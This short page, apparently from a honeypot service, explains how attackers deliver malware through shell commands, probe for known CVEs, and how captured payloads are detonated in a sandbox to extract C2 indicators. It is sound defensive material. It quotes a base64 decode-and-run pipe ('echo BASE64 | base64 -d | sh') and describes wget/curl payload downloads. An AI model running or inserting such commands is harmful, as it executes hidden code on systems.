Understanding Delivery Methods
When attackers gain access to a system (via SSH brute-force, exposed services, etc.), they deploy malware using shell commands. Our honeypot intercepts these commands before execution.
Base64 pipes encode the payload to evade basic detection:
echo BASE64 | base64 -d | sh
wget/curl downloads fetch malware from attacker-controlled servers, often IoT botnets like Mirai variants.
Vulnerability Scanning
Attackers continuously probe for known vulnerabilities. Our honeypot identifies these attempts by matching request patterns against known CVE exploits.
Critical CVEs like Log4Shell, Spring4Shell, and Exchange ProxyLogon remain popular targets years after disclosure.
🔬 Safe Malware Execution
We execute intercepted payloads in an isolated sandbox environment to observe their runtime behavior. This reveals C2 infrastructure that static analysis misses.
What we extract from detonation:
- IRC channel names, passwords, and operator nicknames
- HTTP beacon URLs and check-in patterns
- Bot commands and attack targets
- Network indicators (DNS queries, connection attempts)
The sandbox uses network isolation with traffic interception—malware thinks it's talking to real C2 servers, but we capture everything.